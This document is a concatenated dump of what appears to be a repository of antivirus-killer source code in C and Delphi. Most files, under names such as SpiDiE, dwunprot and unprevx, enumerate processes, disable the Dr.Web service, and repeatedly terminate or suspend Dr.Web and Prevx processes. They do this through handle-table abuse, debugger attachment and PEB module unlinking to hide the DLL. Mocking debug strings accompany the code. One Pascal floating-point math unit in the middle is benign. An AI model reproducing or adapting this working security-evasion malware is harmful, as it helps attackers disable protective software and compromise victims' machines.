49 | 50 | if (lstrcmpi(Entry.szExeFile, TEXT("dwengine.exe")) == 0) 51 | IsDwService = TRUE; 52 | else 53 | IsDwService = FALSE; 54 | 55 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Entry.th32ProcessID); 56 | if (hProcess) { 57 | 58 | if (IsDwService == TRUE) { 59 | NtSuspendProcess(hProcess); 60 | } else { 61 | NtTerminateProcess(hProcess, 0); 62 | } 63 | CloseHandle(hProcess); 64 | result = TRUE; 65 | 66 | } else { 67 | 68 | OutputDebugString(TEXT("[evil] OpenProcess fail")); 69 | } 70 | 71 | } 72 | } while (Process32Next(ShotHandle, &Entry)); 73 | } 74 | CloseHandle(ShotHandle); 75 | } 76 | return result; 77 | } 78 | 79 | VOID StopDrWebService( 80 | ) 81 | { 82 | SC_HANDLE hService; 83 | SC_HANDLE hScm; 84 | SERVICE_STATUS ServiceStatus; 85 | 86 | hScm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); 87 | 88 | if (hScm == NULL) 89 | return; 90 | 91 | hService = OpenService(hScm, TEXT("DrWebEngine"), SERVICE_ALL_ACCESS); 92 | if (hService == NULL) { 93 | OutputDebugString(TEXT("OpenService fail")); 94 | return; 95 | } 96 | 97 | if (!ChangeServiceConfig(hService, SERVICE_WIN32_OWN_PROCESS, SERVICE_DISABLED, SERVICE_ERROR_NORMAL, 98 | NULL, NULL, NULL, NULL, NULL, NULL, NULL)) { 99 | OutputDebugString(TEXT("ChangeServiceConfig fail")); 100 | return; 101 | } 102 | 103 | CloseServiceHandle(hService); 104 | CloseServiceHandle(hScm); 105 | 106 | } 107 | 108 | BOOL WINAPI DllMain( 109 | __in HINSTANCE hinstDLL, 110 | __in DWORD fdwReason, 111 | __in LPVOID lpvReserved 112 | ) 113 | { 114 | DisableThreadLibraryCalls(hinstDLL); 115 | StopDrWebService(); 116 | ListProcesses(); 117 | 118 | return TRUE; 119 | } -------------------------------------------------------------------------------- /Source/SpiDiE/SPiDiE_by_rinn_2012/SpiDiE_EX/dll/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "ntdll\ntdll.h" 4 | #include "ntdll\winnative.h" 5 | #include "rtls\prtl.h" 6 | 7 | #pragma warning(disable:4100) // warning C4100: unreferenced formal parameter 8 | 9 | static const TCHAR ServiceName[] = TEXT("helpsvc"); 10 | 11 | static SERVICE_STATUS_HANDLE ssh = NULL; 12 | static SERVICE_STATUS statusrec; 13 | static BOOL quit = FALSE; 14 | 15 | #define EXPORT_FN __declspec(dllexport) 16 | 17 | EXPORT_FN VOID WINAPI 18 | ServiceMain(__in DWORD dwArgc, __in LPTSTR *lpszArgv); 19 | 20 | 21 | DWORD WINAPI HandlerEx1( 22 | DWORD dwControl, 23 | DWORD dwEventType, 24 | LPVOID lpEventData, 25 | LPVOID lpContext 26 | ) 27 | { 28 | switch ( dwControl ) 29 | { 30 | case SERVICE_CONTROL_STOP: 31 | statusrec.dwCurrentState = SERVICE_STOP_PENDING; 32 | SetServiceStatus(ssh, &statusrec); 33 | quit = TRUE; 34 | return NO_ERROR; 35 | 36 | case SERVICE_CONTROL_INTERROGATE: 37 | return NO_ERROR; 38 | } 39 | 40 | return ERROR_CALL_NOT_IMPLEMENTED; 41 | } 42 | 43 | #define ProcessesCount 6 44 | LPTSTR Processes[ProcessesCount] = { 45 | TEXT("dwengine.exe"), 46 | TEXT("dwarkdaemon.exe"), 47 | TEXT("spideragent.exe"), 48 | TEXT("dwscanner.exe"), 49 | TEXT("dwnetfilter.exe"), 50 | TEXT("spideragent_adm.exe") 51 | }; 52 | 53 | BOOL IsInList( 54 | LPTSTR szProcessName 55 | ) 56 | { 57 | INT i; 58 | 59 | for (i = 0; i < ProcessesCount; i++) { 60 | 61 | if (lstrcmpi(Processes[i], szProcessName) == 0) 62 | return TRUE; 63 | 64 | } 65 | return FALSE; 66 | } 67 | 68 | VOID ListProcesses() 69 | { 70 | PROCESSENTRY32 Entry; 71 | HANDLE ShotHandle; 72 | HANDLE hProcess; 73 | BOOL IsDwService = FALSE; 74 | 75 | Entry.dwSize = sizeof(PROCESSENTRY32); 76 | 77 | ShotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 78 | if ( ShotHandle != INVALID_HANDLE_VALUE ) { 79 | if (Process32First(ShotHandle, &Entry)) { 80 | do { 81 | if ( IsInList(Entry.szExeFile) ) { 82 | 83 | if (lstrcmpi(Entry.szExeFile, TEXT("dwengine.exe")) == 0) 84 | IsDwService = TRUE; 85 | else 86 | IsDwService = FALSE; 87 | 88 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Entry.th32ProcessID); 89 | if (hProcess) { 90 | 91 | if (IsDwService == TRUE) { 92 | NtSuspendProcess(hProcess); 93 | } else { 94 | NtTerminateProcess(hProcess, 0); 95 | } 96 | CloseHandle(hProcess); 97 | } 98 | } 99 | } while (Process32Next(ShotHandle, &Entry)); 100 | } 101 | CloseHandle(ShotHandle); 102 | } 103 | } 104 | 105 | VOID WINAPI ServiceMain(__in DWORD dwArgc, __in LPTSTR *lpszArgv) 106 | { 107 | ssh = RegisterServiceCtrlHandlerEx(ServiceName, &HandlerEx1, NULL); 108 | if ( ssh == NULL ) 109 | return; 110 | 111 | statusrec.dwServiceType = SERVICE_WIN32_SHARE_PROCESS; 112 | statusrec.dwCurrentState = SERVICE_RUNNING; 113 | statusrec.dwControlsAccepted = SERVICE_CONTROL_STOP; 114 | statusrec.dwWin32ExitCode = 0; 115 | statusrec.dwServiceSpecificExitCode = 0; 116 | statusrec.dwCheckPoint = 0; 117 | statusrec.dwWaitHint = 0; 118 | 119 | SetServiceStatus(ssh, &statusrec); 120 | 121 | while ( !quit ) { 122 | 123 | ListProcesses(); 124 | Sleep(500); 125 | } 126 | 127 | statusrec.dwCurrentState = SERVICE_STOPPED; 128 | SetServiceStatus(ssh, &statusrec); 129 | } 130 | 131 | BOOL WINAPI DllMain( 132 | __in HINSTANCE hinstDLL, 133 | __in DWORD fdwReason, 134 | __in LPVOID lpvReserved 135 | ) 136 | { 137 | DisableThreadLibraryCalls(hinstDLL); 138 | return TRUE; 139 | } -------------------------------------------------------------------------------- /Source/RTL/FPU.pas: -------------------------------------------------------------------------------- 1 | { Floating POint Runtime lib (Intel386 CPU are minimum, Pentium-class recommended) 2 | 3 | WARNING 4 | /*use InitFPU before calling any of this funcs*/ 5 | (C) 2003 HELL SL, MP_ART 6 | (C) 2003, 2004 Unknown Group North, EP_X0FF 7 | } 8 | unit FPU; 9 | 10 | interface 11 | 12 | function sinl(x: pextended): extended; 13 | function cosl(x: pextended): extended; 14 | function tanl(x: pextended): extended; 15 | function ctgl(x: pextended): extended; 16 | function arcsinl(x: pextended): extended; 17 | function arccosl(x: pextended): extended; 18 | function arctanl(x: pextended): extended; 19 | function arcctgl(x: pextended): extended; 20 | function sqrtl(x: pextended): extended; 21 | function sqrl(x: pextended): extended; 22 | function _log10(x: pextended): extended; 23 | function _log2(x: pextended): extended; 24 | function _ln(x: pextended): extended; 25 | function _log(b, x: pextended): extended; 26 | function _exp(x: pextended): extended; 27 | function _pow(b, e: pextended): extended; 28 | 29 | implementation 30 | 31 | {$r-} 32 | {$q-} 33 | 34 | function sinl(x: pextended): extended; 35 | asm 36 | fld tbyte ptr [eax] 37 | fsin 38 | end; 39 | 40 | function cosl(x: pextended): extended; 41 | asm 42 | fld tbyte ptr [eax] 43 | fcos 44 | end; 45 | 46 | function tanl(x: pextended): extended; 47 | asm 48 | fld tbyte ptr [eax] 49 | fptan 50 | fstp st(0) 51 | end; 52 | 53 | function ctgl(x: pextended): extended; 54 | asm 55 | fld tbyte ptr [eax] 56 | fptan 57 | fdivrp st(1), st(0) 58 | end; 59 | 60 | function arcsinl(x: pextended): extended; 61 | asm 62 | fld tbyte ptr [eax] 63 | fld1 64 | fld st(1) 65 | fld st(2) 66 | fmulp st(1), st(0) 67 | fsubp st(1), st(0) 68 | fsqrt 69 | fpatan 70 | end; 71 | 72 | function arccosl(x: pextended): extended; 73 | asm 74 | fld1 75 | fld tbyte ptr [eax] 76 | fld st(0) 77 | fmulp st(1), st(0) 78 | fsubp st(1), st(0) 79 | fsqrt 80 | fld tbyte ptr [eax] 81 | fpatan 82 | end; 83 | 84 | function arctanl(x: pextended): extended; 85 | asm 86 | fld tbyte ptr [eax] 87 | fld1 88 | fpatan 89 | end; 90 | 91 | function arcctgl(x: pextended): extended; 92 | asm 93 | fld1 94 | fld tbyte ptr [eax] 95 | fpatan 96 | end; 97 | 98 | function sqrtl(x: pextended): extended; 99 | asm 100 | fld tbyte ptr [eax] 101 | fsqrt 102 | end; 103 | 104 | function sqrl(x: pextended): extended; 105 | asm 106 | fld tbyte ptr [eax] 107 | fmul st(0), st(0); 108 | end; 109 | 110 | function _log10(x: pextended): extended; 111 | asm 112 | fldlg2 113 | fld tbyte ptr [eax] 114 | fyl2x 115 | end; 116 | 117 | function _log2(x: pextended): extended; 118 | asm 119 | fld1 120 | fld tbyte ptr [eax] 121 | fyl2x 122 | end; 123 | 124 | function _ln(x: pextended): extended; 125 | asm 126 | fld tbyte ptr [eax] 127 | fldln2 128 | fxch st(1) 129 | fyl2x 130 | end; 131 | 132 | function _log(b, x: pextended): extended; 133 | asm 134 | fld1 135 | fld tbyte ptr [edx] 136 | fyl2x 137 | fld1 138 | fld tbyte ptr [eax] 139 | fyl2x 140 | fdiv 141 | end; 142 | 143 | function _exp(x: pextended): extended; 144 | asm 145 | fld tbyte ptr [eax] 146 | fldl2e 147 | fmulp 148 | fld st(0) 149 | frndint 150 | fsub st(1), st(0) 151 | fxch st(1) 152 | f2xm1 153 | fld1 154 | faddp 155 | fscale 156 | fstp st(1) 157 | end; 158 | 159 | function _pow(b, e: pextended): extended; 160 | var 161 | tmp: extended; 162 | begin 163 | if b^ = 0 then 164 | begin 165 | result := 0; 166 | exit; 167 | end; 168 | if e^ = 0 then 169 | begin 170 | result := 1; 171 | exit; 172 | end; 173 | tmp := e^ * _ln(b); 174 | result := _exp(@tmp); 175 | end; 176 | 177 | end. 178 | 179 | -------------------------------------------------------------------------------- /Source/SpiDiE/v2.2 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E dll} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | {$O-} 6 | {$IFDEF minimum} 7 | program dwunprot; 8 | {$ENDIF} 9 | unit dwunprot; 10 | interface 11 | 12 | uses 13 | Windows, WinNative, RTL, LDasm, Loader; 14 | 15 | 16 | implementation 17 | 18 | const 19 | DrWebProcessesMax = 8; 20 | 21 | String5: PWideChar = '\BaseNamedObjects\dwunprotwait'; 22 | String6: PWideChar = 'dwunprot.dll'; 23 | String7: PWideChar = 'Yeah suckers!'; 24 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 25 | 'dwengine.exe', 'drweb32w.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 26 | 'spidergate.exe', 'spideragent.exe', 'drwebupw.exe', 'frwl_notify.exe'); 27 | 28 | type 29 | _SYSINFOBUF = record 30 | uHandleCount: ULONG; 31 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 32 | end; 33 | SYSINFOBUF = _SYSINFOBUF; 34 | PSYSINFOBUF = ^_SYSINFOBUF; 35 | 36 | _SYSINFO_BUFFER = record 37 | Count: ULONG; 38 | ModInfo: array[0..0] of SYSTEM_MODULE_INFORMATION; 39 | end; 40 | SYSINFO_BUFFER = _SYSINFO_BUFFER; 41 | PSYSINFO_BUFFER = ^_SYSINFO_BUFFER; 42 | 43 | var 44 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 45 | ProcessHandles: array[0..29] of THANDLE; 46 | 47 | buf1: LBuf; 48 | 49 | ProcessHandlesCount: integer = 0; 50 | pBuffer: PROCESSENTRY32W; 51 | SnapShotHandle: THANDLE; 52 | 53 | modinf: SYSINFO_BUFFER; 54 | bytesIO: ULONG; 55 | 56 | EventHandle: THANDLE; 57 | attr: OBJECT_ATTRIBUTES; 58 | str1: UNICODE_STRING; 59 | 60 | 61 | function FillProcessesArray(): boolean; 62 | var 63 | h2: THANDLE; 64 | bytesIO: ULONG; 65 | buf: PSYSINFOBUF; 66 | last, i, c: integer; 67 | pbi: PROCESS_BASIC_INFORMATION; 68 | begin 69 | ProcessHandlesCount := 0; 70 | memzero(@DrWebID, sizeof(DrWebID)); 71 | memzero(@ProcessHandles, sizeof(ProcessHandles)); 72 | 73 | last := 0; 74 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 75 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 76 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 77 | begin 78 | if Process32FirstW(SnapShotHandle, @pBuffer) then 79 | repeat 80 | 81 | if (last = DrWebProcessesMax) then break; 82 | for i := 0 to DrWebProcessesMax do 83 | begin 84 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 85 | begin 86 | DrWebID[last] := pBuffer.th32ProcessID; 87 | inc(last); 88 | end; 89 | end; 90 | 91 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 92 | CloseHandle(SnapShotHandle); 93 | end; 94 | 95 | bytesIO := 4194304; 96 | buf := nil; 97 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 98 | if (buf <> nil) then 99 | begin 100 | 101 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 102 | for c := 0 to Integer(buf^.uHandleCount) - 1 do 103 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 104 | begin 105 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 106 | begin 107 | 108 | h2 := buf^.rHandleTable[c].Handle; 109 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 110 | begin 111 | for i := 0 to DrWebProcessesMax do 112 | begin 113 | if (pbi.UniqueProcessId = DrWebID[i]) then 114 | begin 115 | ProcessHandles[ProcessHandlesCount] := h2; 116 | inc(ProcessHandlesCount); 117 | end; 118 | end; 119 | end; 120 | 121 | end; 122 | end; 123 | bytesIO := 0; 124 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE); 125 | end; 126 | result := (ProcessHandlesCount > 0); 127 | end; 128 | 129 | procedure KillProcesses(); 130 | var 131 | i: integer; 132 | begin 133 | for i := 0 to ProcessHandlesCount - 1 do 134 | begin 135 | ZwTerminateProcess(ProcessHandles[i], 0); 136 | ZwClose(ProcessHandles[i]); 137 | end; 138 | end; 139 | 140 | const 141 | String8: PWideChar = #20'Elvis has left the building'; 142 | 143 | procedure main(); 144 | begin 145 | EventHandle := 0; 146 | RtlInitUnicodeString(@str1, String5); 147 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 148 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 149 | begin 150 | if (FillProcessesArray()) then 151 | begin 152 | KillProcesses(); 153 | ZwSetEvent(EventHandle, nil); 154 | ZwClose(EventHandle); 155 | 156 | while (true) do 157 | begin 158 | NtSleep(1000); 159 | if (FillProcessesArray()) then 160 | begin 161 | KillProcesses(); 162 | OutputDebugStringW(String7); 163 | end; 164 | end; 165 | end; 166 | end; 167 | end; 168 | 169 | asm 170 | call main 171 | xor eax, eax 172 | inc eax 173 | retn $000c 174 | end. 175 | 176 | -------------------------------------------------------------------------------- /Source/OpPrevx/v1.0.187/unprevx_lib.dpr: -------------------------------------------------------------------------------- 1 | {$E dll} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program oxuetb_lib; 7 | {$ENDIF} 8 | unit oxuetb_lib; 9 | interface 10 | 11 | uses 12 | Windows, WinNative, RTL; 13 | 14 | 15 | implementation 16 | 17 | const 18 | String5: PWideChar = '\BaseNamedObjects\UnPrevxMeHarder'; 19 | ProcessesMaxID = 1; 20 | TargetProcesses: array[0..ProcessesMaxID] of PWideChar = ('Prevx.exe', ''); 21 | 22 | type 23 | _SYSINFOBUF = record 24 | uHandleCount: ULONG; 25 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 26 | end; 27 | SYSINFOBUF = _SYSINFOBUF; 28 | PSYSINFOBUF = ^_SYSINFOBUF; 29 | 30 | var 31 | ProcessHandles: array[0..31] of THANDLE; 32 | ProcessesID: array[0..ProcessesMaxID] of DWORD; 33 | ProcessHandlesCount: integer = 0; 34 | 35 | SnapShotHandle: THANDLE; 36 | EventHandle: THANDLE; 37 | pBuffer: PROCESSENTRY32W; 38 | attr: OBJECT_ATTRIBUTES; 39 | str1: UNICODE_STRING; 40 | buf: array[0..PAGE_SIZE] of BYTE; 41 | buf1: LBuf; 42 | 43 | function FillProcessesArray(): boolean; 44 | var 45 | bFound: boolean; 46 | bytesIO: ULONG; 47 | buf: PSYSINFOBUF; 48 | last, i, c: integer; 49 | pbi: PROCESS_BASIC_INFORMATION; 50 | begin 51 | result := false; 52 | 53 | ProcessHandlesCount := 0; 54 | memzero(@ProcessesID, sizeof(ProcessesID)); 55 | memzero(@ProcessHandles, sizeof(ProcessHandles)); 56 | 57 | last := 0; 58 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 59 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 60 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 61 | begin 62 | if Process32FirstW(SnapShotHandle, @pBuffer) then 63 | repeat 64 | 65 | for i := 0 to ProcessesMaxID - 1 do 66 | begin 67 | if (strcmpiW(pBuffer.szExeFile, TargetProcesses[i]) = 0) then 68 | begin 69 | ProcessesID[last] := pBuffer.th32ProcessID; 70 | inc(last); 71 | end; 72 | end; 73 | 74 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 75 | CloseHandle(SnapShotHandle); 76 | end else exit; 77 | 78 | bytesIO := 4194304; 79 | buf := nil; 80 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 81 | if (buf <> nil) then 82 | begin 83 | 84 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 85 | for c := 0 to Integer(buf^.uHandleCount) - 1 do 86 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) and (buf^.rHandleTable[c].ObjectTypeNumber = 5) then 87 | begin 88 | ProcessHandles[ProcessHandlesCount] := buf^.rHandleTable[c].Handle; 89 | 90 | bFound := false; 91 | if (ZwQueryInformationProcess(ProcessHandles[ProcessHandlesCount], ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 92 | begin 93 | 94 | for i := 0 to ProcessesMaxID do 95 | if (pbi.UniqueProcessId = ProcessesID[i]) then 96 | begin 97 | bFound := true; 98 | inc(ProcessHandlesCount); 99 | break; 100 | end; 101 | 102 | end; 103 | if not bFound then 104 | ProcessHandles[ProcessHandlesCount] := 0; 105 | 106 | end; 107 | bytesIO := 0; 108 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE); 109 | end; 110 | result := (ProcessHandlesCount > 0); 111 | end; 112 | 113 | procedure KillProcesses(); 114 | var 115 | i: integer; 116 | bytesIO: DWORD; 117 | buf: PSYSINFOBUF; 118 | begin 119 | if (DbgUiConnectToDbg() <> STATUS_SUCCESS) then exit; 120 | 121 | for i := 0 to ProcessHandlesCount - 1 do 122 | begin 123 | if (DbgUiDebugActiveProcess(ProcessHandles[i]) = STATUS_SUCCESS) then 124 | ZwClose(ProcessHandles[i]); 125 | end; 126 | bytesIO := 4194304; 127 | buf := nil; 128 | ZwAllocateVirtualMemory(NtCurrentProcess, @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 129 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 130 | for i := 0 to buf^.uHandleCount - 1 do 131 | if (buf^.rHandleTable[i].ProcessId = NtGetCurrentProcessId()) then 132 | begin 133 | if (buf^.rHandleTable[i].ObjectTypeNumber = $8) then 134 | begin 135 | ZwClose(buf^.rHandleTable[i].Handle); 136 | break; 137 | end; 138 | end; 139 | bytesIO := 0; 140 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE); 141 | end; 142 | 143 | procedure main(); 144 | begin 145 | EventHandle := 0; 146 | Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE); 147 | RtlInitUnicodeString(@str1, String5); 148 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 149 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 150 | begin 151 | if FillProcessesArray() then 152 | KillProcesses(); 153 | ZwSetEvent(EventHandle, nil); 154 | ZwClose(EventHandle); 155 | end; 156 | end; 157 | 158 | asm 159 | call main 160 | xor eax, eax 161 | inc eax 162 | retn $000c 163 | end. 164 | 165 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.4 G2 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E dll} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program dwunprot; 7 | {$ENDIF} 8 | unit dwunprot; 9 | interface 10 | 11 | uses 12 | Windows, WinNative, RTL; 13 | 14 | 15 | implementation 16 | 17 | const 18 | DrWebProcessesMax = 6; 19 | String1: PWideChar = 'Terminating by handle 0x'; 20 | String2: PWideChar = 'Whoups I did it again }:)'; 21 | String4: PWideChar = 'Bonjourno!'; 22 | String5: PWideChar = '\BaseNamedObjects\dwunprotwait'; 23 | String6: PWideChar = 'dwunprot.dll'; 24 | FunnyStuff: array[0..4] of PWideChar = ('By buying Dr.Web you are supporting Communism }:)', 'Vodka - Daniloff!', 25 | 'Perestroyka - Komarov!', 'Communism - Gladkih!', ''); 26 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 27 | 'drweb32w.exe', 'dwengine.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 'spidergate.exe', 'spideragent.exe'); 28 | 29 | type 30 | _SYSINFOBUF = record 31 | uHandleCount: ULONG; 32 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 33 | end; 34 | SYSINFOBUF = _SYSINFOBUF; 35 | PSYSINFOBUF = ^_SYSINFOBUF; 36 | 37 | var 38 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 39 | ProcessHandles: array[0..39] of THANDLE; 40 | ProcessHandlesCount: integer = 0; 41 | pBuffer: PROCESSENTRY32W; 42 | SnapShotHandle: THANDLE; 43 | 44 | procedure FillProcessesArray(); 45 | var 46 | h2: THANDLE; 47 | bytesIO: ULONG; 48 | buf: PSYSINFOBUF; 49 | last, i, c: integer; 50 | pbi: PROCESS_BASIC_INFORMATION; 51 | begin 52 | ProcessHandlesCount := 0; 53 | memzero(@DrWebID, sizeof(DrWebID)); 54 | memzero(@ProcessHandles, sizeof(ProcessHandles)); 55 | 56 | last := 0; 57 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 58 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 59 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 60 | begin 61 | if Process32FirstW(SnapShotHandle, @pBuffer) then 62 | repeat 63 | 64 | if (last = DrWebProcessesMax) then break; 65 | for i := 0 to DrWebProcessesMax do 66 | begin 67 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 68 | begin 69 | DrWebID[last] := pBuffer.th32ProcessID; 70 | inc(last); 71 | end; 72 | end; 73 | 74 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 75 | CloseHandle(SnapShotHandle); 76 | end; 77 | 78 | bytesIO := 4194304; 79 | buf := nil; 80 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 81 | if (buf <> nil) then 82 | begin 83 | 84 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 85 | for c := 0 to buf^.uHandleCount - 1 do 86 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 87 | begin 88 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 89 | begin 90 | 91 | h2 := buf^.rHandleTable[c].Handle; 92 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 93 | begin 94 | for i := 0 to DrWebProcessesMax do 95 | begin 96 | if (pbi.UniqueProcessId = DrWebID[i]) then 97 | begin 98 | ProcessHandles[ProcessHandlesCount] := h2; 99 | inc(ProcessHandlesCount); 100 | end; 101 | end; 102 | end; 103 | 104 | end; 105 | end; 106 | bytesIO := 0; 107 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE); 108 | end; 109 | end; 110 | 111 | var 112 | buf1: LBuf; 113 | EventHandle: THANDLE; 114 | attr: OBJECT_ATTRIBUTES; 115 | str1: UNICODE_STRING; 116 | 117 | procedure KillProcesses(); 118 | var 119 | i: integer; 120 | begin 121 | for i := 0 to ProcessHandlesCount - 1 do 122 | begin 123 | strcpyW(@buf1[0], String1); 124 | uitohexW(ProcessHandles[i], strendW(buf1)); 125 | OutputDebugStringW(buf1); 126 | 127 | if (ZwTerminateProcess(ProcessHandles[i], 0) = STATUS_SUCCESS) then 128 | OutputDebugStringW(String2); 129 | ZwClose(ProcessHandles[i]); 130 | end; 131 | end; 132 | 133 | procedure RandomizeEx(); 134 | var 135 | p1: NTSYSTEMTIME; 136 | p2: LARGE_INTEGER; 137 | begin 138 | ZwQuerySystemTime(@p2); 139 | RtlTimeToTimeFields(@p2, @p1); 140 | RandSeed := (((((p1.Hour * 60) + p1.Minute) * 60) + p1.Second) * 100) + p1.Milliseconds; 141 | end; 142 | 143 | procedure main(); 144 | var 145 | s: integer; 146 | begin 147 | OutputDebugStringW(String4); 148 | EventHandle := 0; 149 | RtlInitUnicodeString(@str1, String5); 150 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 151 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 152 | begin 153 | FillProcessesArray(); 154 | KillProcesses(); 155 | ZwSetEvent(EventHandle, nil); 156 | ZwClose(EventHandle); 157 | RandomizeEx(); 158 | 159 | while (true) do 160 | begin 161 | NtSleep(5000); 162 | FillProcessesArray(); 163 | KillProcesses(); 164 | s := random(4); 165 | OutputdebugStringW(FunnyStuff[s]); 166 | end; 167 | 168 | end; 169 | end; 170 | 171 | asm 172 | call main 173 | xor eax, eax 174 | inc eax 175 | retn $000c 176 | end. 177 | 178 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.3 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E DLL} 2 | {$IMAGEBASE $00600000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program dwunprot; 7 | {$ENDIF} 8 | unit dwunprot; 9 | interface 10 | 11 | {$R Resources.res} 12 | 13 | uses 14 | Windows, WinNative, RTL; 15 | 16 | 17 | implementation 18 | 19 | const 20 | DrWebProcessesMax = 6; 21 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 22 | 'drweb32w.exe', 'dwengine.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 'spidergate.exe', 'spideragent.exe'); 23 | 24 | var 25 | hinst: DWORD = $00600000; 26 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 27 | 28 | function LdrGetModuleHandle(lpModule: PWideChar): THANDLE; stdcall; 29 | var 30 | pTeb1: PTEB; 31 | f: LIST_ENTRY; 32 | cur: PLIST_ENTRY; 33 | begin 34 | result := 0; 35 | asm 36 | mov eax, large fs:18h 37 | mov pTeb1, eax 38 | end; 39 | if (lpModule = nil) then 40 | begin 41 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 42 | exit; 43 | end; 44 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 45 | cur := f.Flink; 46 | while (true) do 47 | begin 48 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 49 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 50 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 51 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 52 | begin 53 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 54 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 55 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 56 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 57 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 58 | break; 59 | end; 60 | cur := cur^.Flink; 61 | if (cur = nil) or (cur = f.Flink) then break; 62 | end; 63 | end; 64 | 65 | var 66 | ProcessHandles: array[0..99] of THANDLE; 67 | ProcessHandlesCount: integer; 68 | 69 | type 70 | _SYSINFOBUF = record 71 | uHandleCount: ULONG; 72 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 73 | end; 74 | SYSINFOBUF = _SYSINFOBUF; 75 | 